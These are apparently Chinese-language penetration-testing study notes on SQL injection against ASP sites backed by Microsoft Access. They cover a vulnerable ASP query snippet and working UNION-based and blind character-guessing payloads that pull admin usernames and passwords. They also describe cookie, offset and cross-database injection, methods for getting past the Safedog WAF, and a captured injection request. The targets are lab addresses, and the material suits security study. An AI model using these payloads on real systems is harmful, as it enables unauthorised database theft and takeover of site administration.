Access注入攻击方式
主要有:union 注入、http header 注入、偏移注入等
Access数据库特点
(access只有一个数据库)
Access数据库
表名
列名
数据
直接暴力破解
access三大攻击手法
1.access注入攻击片段-联合查询法
2.access注入攻击片段-逐字猜解法
3.工具类的使用注入(推荐)
该页面asp的sql语句
<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>
1.access注入攻击片段-联合查询
优缺点
优点:快速
缺点:如果sql语句不常规,该方法无效
步骤
判断注入
Order by 22 22 代表查询的列名的数目有22个
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常(小于等于22均正常)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误
猜解表名 确定存在admin表名
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
猜解列名 猜解数据
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
表名和列名猜解成功率不是百分百,猜解不到解决办法?
1.字典文件收集(社工)
2.Access偏移注入
工具猜解字典文件设置:
2.access注入攻击片段-逐字猜解法
//兼容性好,工具一般采用这种方法
查表:and exists (select * from 表名)
查列:and exists (select 列名 from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5 //=换成<=5也成立,下同
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
啊D工具跑的时候界面下面能看到语句
Admin
Admin,password
Admin列名长度为5
Password 列名长度为16
拓展:
抓包分析注入工具核心注入语句
利用自己的编程技能实现山寨工具
啊D判断注入点:
wsexplore监听啊D抓到的数据包:
GET /Production/PRODUCT_DETAIL.asp?id=1513%20%20and%20exists%20(select%20*%20from%20sysobjects) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Cookie: ASPSESSIONIDSATARCBS=JKKPGAIDNNFGACMCDEJGCMEC;
ASPSESSIONIDSCSCSABT=HALFGFIDEIPDGCDIIFJNAKPF
3.注入工具
啊D,明小子,穿山甲,萝卜头havij,sqlmap、、、、
工具功能性:
支持数据库类型,支持注入类型,注入突破类型,工具速度、、、、
偏移注入
表名知道,列名无法获取的注入
1.用“*”代替admin表的字段数,计算*代替字符的位数
正常页面
字段数
爆数据
跨库注入
假设 a 和 b 两个站点在同一服务器上面,但服务器上面安装了安全狗、Waf 这样的安全软件,现在我们要对 a 站点进行攻击,但是没发现什么大漏洞,只找到网站数据库路径,对数据库下载发现下载不了。这个时候我发现 b 站点有注入点
cookie注入
正常页面 http://192.168.232.133:86/shownews.asp?id=27
burp有的响应无法显示页面,只能看Raw,但最直接的是看Content-Length(错误页面数据量小)
注入判断
放到cookie中仍正常返回存在cookie注入
页面和正常不一致说明
猜字段数
字段数11
注入绕过
大小写绕过
编码绕过
字符添加绕过
提交绕过
安全狗防护方面:
注入,上传,后门,控制,扫描,下载
注入:需研究 难度大
上传:需研究 难度大
后门:难度一般 有办法
控制:难度较大 有办法
扫描:表面 绕过 难度较大 复杂
下载:没办法
实战
注入判断
猜表
猜列
猜数据
用同样的方法,可猜解 user_name 字段值和 password 值
最终结果:
[user_name]: admin
[password]: 21232f297a57a5a743894a0e4a801fc3
后台登录
后台地址可通过 踩点(信息收集) 获得
小提示:
access 数据库都是存放在网站目录下,后缀格式为 mdb,asp,asa,可以通过一些暴库手段、目录猜解等直接下载数据库,
如果是 MSSQL、MYSQL 等,一般数据库是存储在数据库安装路径下,后缀格式为 myi,myd,frm,mdf 不能通过下载得到库。除非走狗屎运,对方管理员把网站库备份在网站目录下。
php+mysql数据库存储在数据库安装路径下,后缀格式 myi,myd,frm